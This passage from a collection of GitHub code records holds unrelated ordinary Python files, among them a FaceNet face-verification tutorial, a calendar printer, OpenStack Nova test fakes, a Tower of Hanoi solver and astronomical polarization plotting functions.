tf.reduce_sum(tf.square(tf.subtract(anchor, negative)), axis=-1)\n    \n    # step4 计算 pos_dist - neg_dist再加上两者之间的间距alpha\n    basic_loss = tf.add(tf.subtract(pos_dist, neg_dist), alpha)\n    \n    # step5 通过取带零的最大值和训练样本的求和来计算整个公式\n    loss = tf.reduce_sum(tf.maximum(basic_loss, 0))\n    \n    return loss\n\n\n#创建模型\nFaceNet = faceRecoModel(input_shape=(3, 96, 96))\n\n#开始时间\nstart_time = time.clock()\n\n#编译模型\nFaceNet.compile(optimizer = 'adam', loss = triplet_loss, metrics = ['accuracy'])\n\n#加载权值\nfr_utils.load_weights_from_FaceNet(FaceNet)\n\n#结束时间\nend_time = time.clock()\n\n#计算时差\nminium = end_time - start_time\n\nprint(\"执行了:\" + str(int(minium / 60)) + \"分\" + str(int(minium%60)) + \"秒\")\n\n \ndatabase = {}\ndatabase[\"danielle\"] = fr_utils.img_to_encoding(\"images/danielle.png\", FaceNet)\ndatabase[\"younes\"] = fr_utils.img_to_encoding(\"images/younes.jpg\", FaceNet)\ndatabase[\"tian\"] = fr_utils.img_to_encoding(\"images/tian.jpg\", FaceNet)\ndatabase[\"andrew\"] = fr_utils.img_to_encoding(\"images/andrew.jpg\", FaceNet)\ndatabase[\"kian\"] = fr_utils.img_to_encoding(\"images/kian.jpg\", FaceNet)\ndatabase[\"dan\"] = fr_utils.img_to_encoding(\"images/dan.jpg\", FaceNet)\ndatabase[\"sebastiano\"] = fr_utils.img_to_encoding(\"images/sebastiano.jpg\", FaceNet)\ndatabase[\"bertrand\"] = fr_utils.img_to_encoding(\"images/bertrand.jpg\", FaceNet)\ndatabase[\"kevin\"] = fr_utils.img_to_encoding(\"images/kevin.jpg\", FaceNet)\ndatabase[\"felix\"] = fr_utils.img_to_encoding(\"images/felix.jpg\", FaceNet)\ndatabase[\"benoit\"] = fr_utils.img_to_encoding(\"images/benoit.jpg\", FaceNet)\ndatabase[\"arnaud\"] = fr_utils.img_to_encoding(\"images/arnaud.jpg\", FaceNet)\n\ndef verify(image_path, identity, database, model):\n    \"\"\"\n    对“identity”与“image_path”的编码进行验证。\n\n    参数:\n        image_path -- 摄像头的图片。\n        identity -- 字符类型,想要验证的人的名字。\n        database -- 字典类型,包含了成员的名字信息与对应的编码。\n        model -- 在Keras的模型的实例。\n\n    返回:\n        dist -- 摄像头的图片与数据库中的图片的编码的差距。\n        is_open_door -- boolean,是否该开门。\n    \"\"\"\n    #第一步:计算图像的编码,使用fr_utils.img_to_encoding()来计算。\n    encoding = fr_utils.img_to_encoding(image_path, model)\n\n    #第二步:计算与数据库中保存的编码的差距\n    dist = np.linalg.norm(encoding - database[identity])\n\n    #第三步:判断是否打开门\n    if dist < 0.7:\n        print(\"欢迎 \" + str(identity) + \"回家!\")\n        is_door_open = True\n    else:\n        print(\"经验证,您与\" + str(identity) + \"不符!\")\n        is_door_open = False\n\n    return dist, is_door_open\n    \n    \nverify(\"images/camera_0.jpg\",\"younes\",database, FaceNet) \n    \n    \n","repo_name":"gear106/python_ml_code","sub_path":"FaceNet/FaceNet_keras.py","file_name":"FaceNet_keras.py","file_ext":"py","file_size_in_byte":4504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"38616510950","text":"def daysinmonth(month,year):\n    if month==1 or month==3 or month==5 or month==7 or month==8 or month==10 or month==12:\n        day=31\n    elif month==4 or month==6 or month==9 or month==11:\n        day=30\n    else:\n        if year%4==0 and (year%100!=0 or year%400==0):\n            day=29\n        else:\n            day=28\n    return day\n\ndef dayofweek(d, m, y): \n    t = [ 0, 3, 2, 5, 0, 3, 5, 1, 4, 6, 2, 4 ] \n    y -= m < 3\n    return (( y + int(y / 4) - int(y / 100) + int(y / 400) + t[m - 1] + d) % 7)\n\ny=int(input(\"Enter Year : \"))\nm=int(input(\"Enter Month (In Number) : \"))\nt=dayofweek(1,m,y)\nday=daysinmonth(m,y)\nprint(\"M\\tT\\tW\\tTh\\tF\\tS\\tS\")\na=1\nfor i in range (1,7):\n    if a>day:\n        break\n    for j in range(1,8):\n        if i==1:\n            if j>=t:\n                print(\"{}\\t\".format(a),end='')\n                a+=1\n            else:\n                print(\" \\t\",end='')\n        else:\n            print(\"{}\\t\".format(a),end='')\n            
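# after printing the date, advance to the next day number\n            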
a+=1\n if(a>day):\n break\n print()","repo_name":"soumya-shome/My-Guide-to-Coding","sub_path":"Calendar_Month/Calendar_Month.py","file_name":"Calendar_Month.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74618519777","text":"import chainer\nimport shufflenet_v2\nimport chainertools\nimport cv2\nimport numpy as np\nimport time\n\n\ndef main(args):\n with chainer.using_config('train', False):\n with chainer.using_config('enable_backprop', False):\n snapshot_file = args.snapshot\n label_encoder = chainertools.openimages.openimages_label_encoder(\n \".\")\n k = shufflenet_v2.guess_k(snapshot_file)\n net = shufflenet_v2.ShuffleNetV2(k, label_encoder.num_classes())\n chainer.serializers.load_npz(\n snapshot_file, net, \"updater/model:main/predictor/\")\n if args.gpu >= 0:\n net.to_gpu(args.gpu)\n\n camera_id = -1\n camera = cv2.VideoCapture(camera_id)\n dt_filtered = 0.\n alpha = 0.1\n while True:\n success, frame = camera.read()\n if not success:\n raise RuntimeError(\"could not read frame from camera\")\n\n t0 = time.time()\n frame_small_orig = cv2.resize(frame, (224, 224))\n frame_small = cv2.cvtColor(frame_small_orig, cv2.COLOR_BGR2RGB)\n frame_small = np.transpose(frame_small, (2, 0, 1))\n input = net.xp.asarray([frame_small], dtype=np.float32)\n # print(input.shape, input)\n output = net(input)\n output = chainer.functions.sigmoid(output)\n output = chainer.cuda.to_cpu(output.data[0])\n t1 = time.time()\n\n labels_idx = np.where(output > 0.5)[0]\n readable_labels = [label_encoder.readable_label_of_encoded_label(\n lab) for lab in labels_idx]\n\n dt = t1 - t0\n dt_filtered = alpha * dt + (1 - alpha) * dt_filtered\n fps = 1. / dt_filtered\n print(\"{:.2f} fps\".format(fps))\n print(list(zip(readable_labels, output[labels_idx])))\n cv2.imshow(snapshot_file, frame)\n cv2.waitKey(1)\n\n\ndef parse_command_line():\n parser = argparse.ArgumentParser(\n description=\"Demonstration of multilabel classification with Shufflenet v2.\")\n parser.add_argument(\n '--gpu', help='Run on gpu (integer id starting at 0) or cpu (-1)', type=int, default=-1)\n parser.add_argument('--snapshot', help='Model snapshot file',\n default=\"shufflenet-v2-snapshots/x1/snapshot_iter_335305\")\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n import argparse\n args = parse_command_line()\n main(args)\n","repo_name":"lehy/shufflenet-v2-chainer","sub_path":"openimages/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26553848771","text":"import time\nimport uuid\n\nfrom nova.compute import task_states\nfrom nova.compute import vm_states\nfrom nova import db\nfrom nova import utils\n\n\ndef get_fake_instance_data(name, project_id, user_id):\n return {'name': name,\n 'id': 1,\n 'uuid': str(uuid.uuid4()),\n 'project_id': project_id,\n 'user_id': user_id,\n 'image_ref': \"1\",\n 'kernel_id': \"1\",\n 'ramdisk_id': \"1\",\n 'mac_address': \"de:ad:be:ef:be:ef\",\n 'instance_type':\n {'name': 'm1.tiny',\n 'memory_mb': 512,\n 'vcpus': 1,\n 'root_gb': 1024,\n 'flavorid': 1,\n 'rxtx_factor': 1}\n }\n\n\ndef get_fake_image_data(project_id, user_id):\n return {'name': 'image1',\n 'id': 1,\n 'project_id': project_id,\n 'user_id': user_id,\n 'image_ref': \"1\",\n 'kernel_id': \"1\",\n 'ramdisk_id': \"1\",\n 'mac_address': \"de:ad:be:ef:be:ef\",\n 'instance_type': 'm1.tiny',\n }\n\n\ndef 
get_fake_volume_info_data(target_portal, volume_id):\n return {\n 'driver_volume_type': 'iscsi',\n 'data': {\n 'volume_id': 1,\n 'target_iqn': 'iqn.2010-10.org.openstack:volume-' + volume_id,\n 'target_portal': target_portal,\n 'target_lun': 1,\n 'auth_method': 'CHAP',\n }\n }\n\n\ndef get_fake_block_device_info(target_portal, volume_id):\n return {'block_device_mapping': [{'connection_info': {\n 'driver_volume_type': 'iscsi',\n 'data': {'target_lun': 1,\n 'volume_id': volume_id,\n 'target_iqn':\n 'iqn.2010-10.org.openstack:volume-' +\n volume_id,\n 'target_portal': target_portal,\n 'target_discovered': False}},\n 'mount_device': 'vda',\n 'delete_on_termination': False}],\n 'root_device_name': None,\n 'ephemerals': [],\n 'swap': None\n }\n\n\ndef stub_out_db_instance_api(stubs):\n \"\"\"Stubs out the db API for creating Instances.\"\"\"\n\n INSTANCE_TYPES = {\n 'm1.tiny': dict(memory_mb=512, vcpus=1, root_gb=0, flavorid=1),\n 'm1.small': dict(memory_mb=2048, vcpus=1, root_gb=20, flavorid=2),\n 'm1.medium': dict(memory_mb=4096, vcpus=2, root_gb=40, flavorid=3),\n 'm1.large': dict(memory_mb=8192, vcpus=4, root_gb=80, flavorid=4),\n 'm1.xlarge': dict(memory_mb=16384, vcpus=8, root_gb=160, flavorid=5)}\n\n class FakeModel(object):\n \"\"\"Stubs out for model.\"\"\"\n\n def __init__(self, values):\n self.values = values\n\n def get(self, key, default=None):\n if key in self.values:\n return self.values[key]\n else:\n return default\n\n def __getattr__(self, name):\n return self.values[name]\n\n def __getitem__(self, key):\n return self.get(key)\n\n def __setitem__(self, key, value):\n self.values[key] = value\n\n def __str__(self):\n return str(self.values)\n\n def fake_instance_create(context, values):\n \"\"\"Stubs out the db.instance_create method.\"\"\"\n\n if 'instance_type' not in values:\n return\n\n instance_type = values['instance_type']\n\n base_options = {\n 'name': values['name'],\n 'id': values['id'],\n 'uuid': str(uuid.uuid4()),\n 'reservation_id': utils.generate_uid('r'),\n 'image_ref': values['image_ref'],\n 'kernel_id': values['kernel_id'],\n 'ramdisk_id': values['ramdisk_id'],\n 'vm_state': vm_states.BUILDING,\n 'task_state': task_states.SCHEDULING,\n 'user_id': values['user_id'],\n 'project_id': values['project_id'],\n 'launch_time': time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime()),\n 'instance_type': instance_type,\n 'memory_mb': instance_type['memory_mb'],\n 'vcpus': instance_type['vcpus'],\n 'mac_addresses': [{'address': values['mac_address']}],\n 'root_gb': instance_type['root_gb'],\n }\n return FakeModel(base_options)\n\n def fake_instance_type_get_all(context, inactive=0, filters=None):\n return INSTANCE_TYPES.values()\n\n def fake_instance_type_get_by_name(context, name):\n return INSTANCE_TYPES[name]\n\n def fake_block_device_mapping_get_all_by_instance(context, instance_uuid):\n return {}\n\n stubs.Set(db, 'instance_create', fake_instance_create)\n stubs.Set(db, 'instance_type_get_all', fake_instance_type_get_all)\n stubs.Set(db, 'instance_type_get_by_name', fake_instance_type_get_by_name)\n stubs.Set(db, 'block_device_mapping_get_all_by_instance',\n fake_block_device_mapping_get_all_by_instance)\n","repo_name":"JiYou/openstack","sub_path":"packages/source/nova/nova/tests/hyperv/db_fakes.py","file_name":"db_fakes.py","file_ext":"py","file_size_in_byte":5129,"program_lang":"python","lang":"en","doc_type":"code","stars":399,"dataset":"github-code","pt":"34"} +{"seq_id":"19454118451","text":"# -*- coding: utf-8 -*-\n\n# -*- coding: utf-8 -*-\n\nfrom flask import 
Blueprint, request, redirect, flash, url_for\nfrom flask import render_template\nfrom jinja2 import TemplateNotFound\nfrom flask import abort\nfrom flask_login import (login_user, current_user, login_required, logout_user)\nfrom wechat_sdk import WechatBasic\n\n\nvaliation_app = Blueprint('valiation', __name__, template_folder='templates')\n\n\n@valiation_app.route('/jfjl_valiation', methods=['GET', 'POST'])\ndef jfjl_valiation():\n args = request.args\n token = 'jiefangjieli'\n echostr = args['echostr']\n signature = args['signature']\n timestamp = args['timestamp']\n nonce = args['nonce']\n wechat = WechatBasic(token=token)\n # 对签名进行校验\n if wechat.check_signature(signature=signature, timestamp=timestamp, nonce=nonce):\n return echostr\n else:\n return \"This is jfjl valiation!\"\n\n\n\n\n","repo_name":"qitianchan/neighbour_0.1","sub_path":"neighbour/district/valiation.py","file_name":"valiation.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36107582833","text":"#!/usr/bin/env python\n\nimport sys\nimport numpy\nfrom rios import applier\nfrom rios import fileinfo\n\ndef doMinimum(info, inputs, outputs, otherargs):\n \"Called from RIOS. Average the input files\"\n minimum = numpy.zeros(inputs.imgs[0].shape, dtype = numpy.float32)\n for img in inputs.imgs:\n img[numpy.isnan(img)] = otherargs.noDataVal\n \n imgNonNull = (img != otherargs.noDataVal)\n minNull = (minimum == otherargs.noDataVal)\n minimum[minNull] = img[minNull]\n newMin = (imgNonNull & ~minNull & (img < minimum))\n minimum[newMin] = img[newMin]\n\n\n outputs.min = minimum.astype(img.dtype)\n\ninfiles = applier.FilenameAssociations()\n# names of imput images\ninfiles.imgs = sys.argv[1:]\n\notherargs = applier.OtherInputs()\notherargs.noDataVal = float(fileinfo.ImageInfo(infiles.imgs[0]).nodataval[0])\nprint(otherargs.noDataVal)\n\n# Last name given is the output\noutfiles = applier.FilenameAssociations()\noutfiles.min = \"outfile18.img\"\ncontrols = applier.ApplierControls()\ncontrols.setFootprintType(applier.UNION)\napplier.apply(doMinimum, infiles, outfiles, otherargs, controls=controls)\n","repo_name":"jasminemuir/phd","sub_path":"create_minimage.py","file_name":"create_minimage.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"6634180886","text":"# python standard libraries\r\nimport json\r\n\r\n# dependencies\r\nfrom TwitchPy import TwitchBot\r\n\r\n# local modules\r\nimport commands\r\nimport database\r\nimport loops\r\n\r\n\r\n\r\n'''TO DO\r\n * when someone does a command like '!mock @monipoop', check whether that user exists in API or check if they're in chat?\r\n before automatically adding them to the database to avoid issues where the database is filled with 'phantom' users which\r\n are all typos.\r\n\r\n * commands still needed to add:\r\n help\r\n\r\n redeem: spending points for stuff to happen\r\n\r\n eventlist\r\n spawnevent\r\n\r\n mystery points box\r\n bid\r\n topbid\r\n\r\n lottery\r\n checklotto\r\n buytix\r\n checktix\r\n'''\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n with open('login_info.json', 'r') as file:\r\n login = json.load(file)\r\n\r\n bot = TwitchBot.Client(**login)\r\n\r\n db = database.Handler()\r\n\r\n basic = commands.Basic(bot)\r\n copypasta = commands.CopyPasta(bot.get_IRC())\r\n points = commands.Points(bot, db)\r\n\r\n bot.add_cogs([basic, copypasta, points])\r\n\r\n 
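# run the bot; the finally block below guarantees the database is closed on shutdown\r\n    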
try:\r\n        bot.run()\r\n    finally:\r\n        db.close()","repo_name":"rexosorous/twitch-bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"36362218228","text":"import geocoder\nimport sys \nsys.path.insert(0, '/home/chingyuc/CYCFBbot')\nimport fbbot\nimport msganalyzer\nimport messenger\nimport handleuserinfo \nfrom geopy.distance import vincenty\n\n################################################################################\n\n# google geocode key\ngeokey = \"\"\ntry:\n    with open('geocoder_key', 'r') as f:\n        geokey = f.read().strip()\n        f.close()\n    assert(len(geokey) != 0)\nexcept:\n    print(\"error in accessing geocoder key\")\n\n################################################################################\n\ndef check_start(data):\n\n    '''\n    The check function of the start state. Check if command in data is valid. \n    Return true.\n    '''\n\n    return True\n\n#------------------------------------------------------------------------------\n\ndef state_start(user, msg_content=None, args=None):\n\n    '''\n    Start state function. Send user the address of his/her favorite locations.\n    Return end state.\n    '''\n\n    favs = {\"fav1\":\"\", \"fav2\":\"\"}\n    for key in favs:\n        info = handleuserinfo.get(user, key)\n        if info[0] is not None and info[1] is not None:\n            lat = info[0]\n            lon = info[1]\n            try:\n                result = geocoder.google([lat, lon], method='reverse', \n                                         key=geokey)\n                addr = result.address\n                favs[key] = addr\n            except:\n                messenger.send_text(user, \"Sorry, the google geocoder\"\n                                          \"currently is not operating\")\n                raise ImportError(\"problem using geocoder\")\n                return [\"END\", None]\n\n    text = \"Here's the list of your favorite locations,\\n\"\\\n           \"* fav1 : \\n{favs1}\\n\"\\\n           \"* fav2 : \\n{favs2}\\n\"\\\n           \"\\n\".format(favs1=favs[\"fav1\"], favs2=favs[\"fav2\"])\n    messenger.send_text(user, text)\n    \n    return [\"END\", None]\n\n\n################################################################################\n\n# map of state functions\nstate_funs = {\"START\":state_start}\n\n# map of check functions\ncheck_funs = {\"START\":check_start}\n\n\n","repo_name":"chingyuchen/FBBikeBot","sub_path":"favsfuns.py","file_name":"favsfuns.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"22150999474","text":"# Given a string containing only the characters '(',')','{','}','[',']', determine whether the string is valid.\n\n# A valid string must satisfy:\n\n# Open brackets must be closed by the same type of bracket.\n# Open brackets must be closed in the correct order.\n# Note: the empty string is considered valid.\n\n# Source: LeetCode (力扣)\n# Link: https://leetcode-cn.com/problems/valid-parentheses\n# Copyright belongs to LeetCode. For commercial reprints please contact them for authorization; for non-commercial reprints please cite the source.\n\nclass Solution:\n    def isValid(self, s: str) -> bool:\n        n = len(s)\n        if n%2==1:\n            return False\n        tmp = []\n        dictT = dict([(\")\",\"(\"),(\"]\",\"[\"),(\"}\",\"{\")])\n        for char in s:\n            if tmp:\n                if char in dictT and dictT[char] == tmp[-1]:\n                    tmp.pop()\n                    continue\n            tmp.append(char)\n        return False if len(tmp)>0 else True\n","repo_name":"songc/LeetCode-Pyhton","sub_path":"leetcode20.py","file_name":"leetcode20.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"3824510944","text":"def hanoi(n, start, to, mid, answer): # 시작, 도착, 경유\n    if n == 1:\n        return answer.append([start, to])\n\n    # 가장 큰 원반을 제외한 나머지 n - 1 개의 원반을 도착 기둥 (여기서는 경유지) 를 거쳐 경유 기둥 (여기서는 도착지) 로 이동\n    hanoi(n - 1, start, mid, to, answer)\n\n    # n - 1 개의 원반 이동이 끝났다면 
마지막 하나 남아있는 원반을 직접 도착지로 이동\n answer.append([start, to])\n\n # 앞선 재귀의 결과로 경유지에 있는 n - 1 개의 원반을 시작 기둥을 거쳐 도착지로 이동\n hanoi(n - 1, mid, to, start, answer)\n\n# 하노이의 탑의 중요 전제 조건은, 가장 큰 원반을 제외한 나머지 n - 1 개의 원반을\n# 먼저 경유 기둥으로 옮기고, 가장 큰 원반을 목적 기둥에 옮길 수 있다는 것.\ndef solution(n):\n answer = []\n hanoi(n, 1, 3, 2, answer)\n\n return answer\n\n\nprint(solution(2))","repo_name":"juni8453/python_practice","sub_path":" problem_solving_strategy/복습/recursion/하노이의_탑_복습.py","file_name":"하노이의_탑_복습.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3370186123","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 23 17:42:06 2021\r\n\r\n@author: sabri\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.collections import LineCollection\r\nfrom pylab import *\r\nfrom scipy import odr \r\nfrom scipy.optimize import curve_fit\r\nfrom sklearn.linear_model import LinearRegression\r\nimport imageio\r\nfrom get_data import * \r\nfrom scipy.stats import linregress\r\n#from mpltools import color \r\n\r\ndef plot_p_single(line_list, label_list, color_list, unbinned_t, bin_data_t, bin_size, flux_factor, title, save = \"none\", shift_list = \"none\"):\r\n \"\"\"Creates a single panel plot of polarization and relative flux for one epoch. \r\n Line, label and color lists are to specify features in spectra and may be given empty list []. \r\n wl and flux are unbinned data list collected from get_data function.\r\n The binned lists can be gathered from get_binned. \r\n Flux factor is a number to multiply the flux by so it is scaled to the polarization for presentation. \r\n bin_size is a number provided for labeling. If a title is provided the figure will be saved as that. 
\r\n If a shift_list (a list of wavelengths representing locations of shifted line features) is provided it will be plotted too.\r\n Title must be provided and if save = on plot is saved under title in Single_epoch_tot_p folder.\r\n \"\"\"\r\n \r\n #calculate total polarization\r\n p = bin_data_t['p']\r\n f = unbinned_t['flx']*flux_factor #scale flux \r\n pmax = p.max()#max polarization value (for labels later)\r\n \r\n fig, ax = subplots(1, sharex = True, sharey = True, figsize = (14, 7))\r\n fig.suptitle(title, y = .95, fontsize = 22)\r\n #ax.axvspan(6462, 7102, color = 'lightgrey', label = '+/-15000km/s centered on 6800', alpha = .6) #alpha adjusts the transparency\r\n ax.step(bin_data_t['wave'], p, 'k', label = 'Polarization (Bin Size ' + str(bin_size) +\"Å)\")\r\n ax.fill_between(unbinned_t['wave'], f, color = 'powderblue', label = \"Relative Flux\") \r\n ax.tick_params(axis='both', which='major', labelsize=14)\r\n ax.set_ylim([0, 5.2]); ax.set_xlim([4000, 7900])\r\n ax.legend(loc=\"upper left\", fontsize = 14); \r\n ax.set_xlabel(\"Wavelength(Å)\", fontsize = 16); ax.set_ylabel(\"Percent Total Polarization\", fontsize = 16)\r\n \r\n #ISP estimate areas\r\n #ax.axhline(y=.3, xmin=.335, xmax=.385, c= 'fuchsia')\r\n #ax.axhline(y=.1, xmin=.58, xmax=.62, c= 'fuchsia')\r\n \r\n for xc, c in zip(line_list, color_list):\r\n ax.axvline(x=xc, c=c) #plot veritcle line at location xc in linelist with color c in colorlist\r\n \r\n label_loc = 2 #initial label position \r\n for xc, lab in zip(line_list, label_list):\r\n ax.text(xc+10, label_loc, lab, fontsize = 14, fontstyle = 'oblique', rotation = 'vertical') #add label at verticle position pmax next to line at xc, with label lab from label list \r\n label_loc = label_loc + .2 #change label position each time so they don't overlap \r\n \r\n #plot shifted lines in same color as rest lines if list is provided\r\n if shift_list != \"none\":\r\n for xc, c in zip(shift_list, color_list):\r\n ax.axvline(x=xc, c=c, linestyle = ':', linewidth = 3)\r\n if save != \"none\":\r\n fig.savefig(\"Single_epoch_tot_P/\"+str(title))\r\n return(ax)\r\n\r\n\r\ndef plot_pannels(unbinned_t, bin_data_t, unbin_flux_factor, bin_flux_factor, adjust_pa = 'on', title = 'none'):\r\n \r\n \"\"\"Creates the classic five plots (total polarization,polarized flux, %U, %Q, PA vs wavelength) with the flux \r\n plotted in a shaded region of each pannel. \r\n \r\n Takes in two astropy tables for unbinned and binned data\r\n unbinned_file must contain a column call 'flx' (so make sure to pass that to get_fits if that's used)\r\n \r\n Flux factors are what to multiply the unbinned and binned flux by to be on the same scale as the polarization. \r\n adjust_pa is automatically set to add 180 for values less than 0, if you don't want this adjust_pa = 'off'.\r\n \r\n Provide a title to save plot otherwise the plot will be titled 'none' and will not be saved. 
\r\n \"\"\"\r\n \r\n import numpy as np\r\n import matplotlib.pyplot as plt\r\n \r\n Q = np.array(bin_data_t['q'])*100 #convert fraction to percent \r\n U = np.array(bin_data_t['u'])*100\r\n \r\n F = np.array(unbinned_t['flx'])*unbin_flux_factor #Adjust scale of relative flux to magnitude of polarizations\r\n \r\n P_Flux = bin_data_t['p']*bin_data_t['flx']*bin_flux_factor\r\n \r\n PA = np.degrees(.5*np.arctan2(U, Q)) #calculate PA\r\n \r\n if adjust_pa != 'on': #decide to add 180 to PA or not\r\n pass\r\n else:\r\n for i in range(len(PA)):\r\n if PA[i] < 0:\r\n PA[i] = PA[i]+180\r\n else:\r\n PA[i] = PA[i]+0\r\n\r\n PA_ave = [] #creat list for plotting line of average PA \r\n for i in range(len(PA)): PA_ave.append(np.nanmean(PA)) #calculate average PA\r\n \r\n fig, (ax0, ax1, ax2, ax3, ax4) = plt.subplots(5, sharex = True, figsize=(20,14))\r\n fig.suptitle(title, fontsize=24, y=.95)\r\n ax0.step(bin_data_t['wave'], bin_data_t['p'], 'r'); ax0.fill_between(unbinned_t['wave'], F, color = 'skyblue', label = 'Relative Flux'); ax0.set_ylabel(\"%Polarization\", fontsize = 'medium'); ax0.legend(fontsize='medium')\r\n ax1.step(bin_data_t['wave'], P_Flux, 'r'); ax1.fill_between(unbinned_t['wave'], F, color = 'skyblue'); ax1.set_ylabel(\"Polarized Flux\", fontsize = 'medium')\r\n ax2.step(bin_data_t['wave'], Q, 'r'); ax2.fill_between(unbinned_t['wave'], F, color = 'skyblue'); ax2.set_ylabel(\"% Q\", fontsize = 'medium') \r\n ax3.step(bin_data_t['wave'], U, 'r'); ax3.fill_between(unbinned_t['wave'], F, color = 'skyblue' ); ax3.set_ylabel(\"% U\", fontsize = 'medium') \r\n ax4.step(bin_data_t['wave'], PA, 'r'); ax4.plot(bin_data_t['wave'], PA_ave, 'k', label = 'Average PA: '+ str(round(np.nanmean(PA))) + u'\\xb0', linewidth = 3);ax4.set_ylabel(\"Position Angle\", fontsize = 'medium'); ax4.legend(fontsize = \"medium\"); ax4.set_xlabel(\"Wavelength(Å)\")\r\n \r\n plt.subplots_adjust(wspace=0, hspace=0)\r\n #if title != 'none':\r\n #fig.savefig(\"Pannel_Plots/\"+ title)\r\n #print(\"Plot has been saved under filename \" + str(title) + \" in the Pannel_Plots directory\")\r\n \r\n return (print(\"provide title to save plot\"))\r\n\r\ndef best_fit(Q, U, Qsig, Usig):\r\n from scipy import odr \r\n from scipy.optimize import curve_fit\r\n from sklearn.linear_model import LinearRegression\r\n \r\n \"\"\"Creates an error-weighted best fit line for Q/U plots given 4 lists of percent. 
\r\n \"\"\"\r\n \r\n def func(b, x): \r\n # Linear function y = m*x + b\r\n # b is a vector of the parameters.\r\n # x is an array of the current x values.\r\n return b[0] * x + b[1]\r\n\r\n #model object\r\n lin_model = odr.Model(func)\r\n\r\n #creat real data object\r\n data = odr.RealData(Q, U, sx=Qsig, sy=Usig)\r\n\r\n # Set up ODR with the model and data.\r\n odr = odr.ODR(data, lin_model, beta0=[0., 1.])\r\n\r\n # Run the regression.\r\n out = odr.run()\r\n\r\n #fit peramaters\r\n popt = out.beta\r\n perr = out.sd_beta\r\n print(\"fit parameter 1-sigma error\")\r\n print(\"Slope = \"+ str(popt[0])+\" +- \"+str(perr[0]))\r\n print(\"Intercept = \" + str(popt[1]) + \" +- \" + str(perr[1]))\r\n print(\"———————————–\")\r\n x_fit = np.linspace(min(Q), max(Q))\r\n fit = func(popt, x_fit)\r\n \r\n #links for weighted fit:\r\n #https://micropore.wordpress.com/2017/02/07/python-fit-with-error-on-both-axis/\r\n #https://docs.scipy.org/doc/scipy/reference/odr.html\r\n \r\n return (x_fit, fit)\r\n\r\ndef plot_QU(binned_data, title, size = 3.2, save = 'none', epoch_labels = 'none'):\r\n \r\n \"\"\"Creates a Q vs U plot with points color coded by wavelength and a line of best fit \r\n that includes errors when epoch_labels = 'none' (most common use and is set by defualt). \r\n \r\n Takes in an astropy Table with 'wave', 'q', 'u', 'qerr', 'uerr' columns. \r\n size is auto set to .05 otherwise change for tighter fit. \r\n Title must be provided and if save = on the plot is saved under that in a QU_Plots directory. \r\n A best fit including weighed errors is calculated from lists provided using the function best_fit.\r\n \r\n Optionally one can plot Q/U values without specifying wavelength by color if epoch_labels is set equal to something. \r\n For example to plot the single average Q/U point for three epochs on the same plot \r\n epoch_labels = ['epoch_1', 'epoch_2', 'epoch_3'] and each point will be labeled accordingly. 
\r\n \"\"\"\r\n \r\n wl = binned_data['wave']\r\n #convert fraction to percentage and ignore nan values\r\n Q = [x for x in binned_data['q'] if np.isnan(x) == False] \r\n U = [x for x in binned_data['u'] if np.isnan(x) == False]\r\n Qsig = [x for x in binned_data['qerr'] if np.isnan(x) == False]\r\n Usig = [x for x in binned_data['uerr'] if np.isnan(x) == False]\r\n \r\n wl, Q = zip(*zip(wl, Q)) #makes sure wavelength and other lists are the same length for plotting\r\n #by pairing values up in each then dropping unpaired values \r\n \r\n bfit = best_fit(Q, U, Qsig, Usig)\r\n x_fit = bfit[0]\r\n fit = bfit[1]\r\n \r\n #calculate average error\r\n Qave_err = np.nanmean(Qsig)\r\n Uave_err = np.nanmean(Usig)\r\n\r\n #plot\r\n fig, ax = plt.subplots(1, figsize=(10,10))\r\n rcParams[\"font.size\"]= 20\r\n fig.suptitle(title, fontsize=20, y=.85, x=.44) \r\n ax.axhline(0, color = 'k', linewidth = 1, zorder = 1)\r\n ax.axvline(0, color = 'k', linewidth=1, zorder = 2)\r\n ax.plot(Q, U, c = 'lightgrey', linewidth = 1, zorder = 3 )\r\n ax.axis('square'); ax.set_xlim([-float(size), float(size)]); ax.set_ylim([-float(size), float(size)]) #comment out to see zoomed in \r\n ax.set_xlabel(\"% Q Polarization\", fontsize=18); ax.set_ylabel(\"% U Polarization\", fontsize=18)\r\n\r\n \r\n if epoch_labels == 'none':\r\n #if plotting a a single epoch of data plot colors accoring to wavelength\r\n im = ax.scatter(Q,U, marker = 'o', c=wl, s=20, zorder = 4) #c=color set to a different color for each point in wavelength array, s=size \r\n fig.colorbar(im).ax.set_ylabel('Wavelength(Å)', fontsize=20) #shows colorbar and labels it\r\n ax.plot(x_fit, fit, \"r\", lw=2, label=\"Best Fit\", zorder = 5) #best fit line\r\n ax.errorbar((-float(size) + .005), (float(size) - .0058), xerr = Qave_err, yerr = Uave_err) #add error bar example in location based on grid size \r\n #ax.text((-float(size)+ .008), (float(size) - .0055), \"Average Error\", fontsize = 13)\r\n else:\r\n #if ploting average data points (wavelength doesn't matter) plot all points as same color \r\n im = ax.scatter(Q,U, marker = 'o', s=20, zorder = 5)\r\n ax.errorbar(Q, 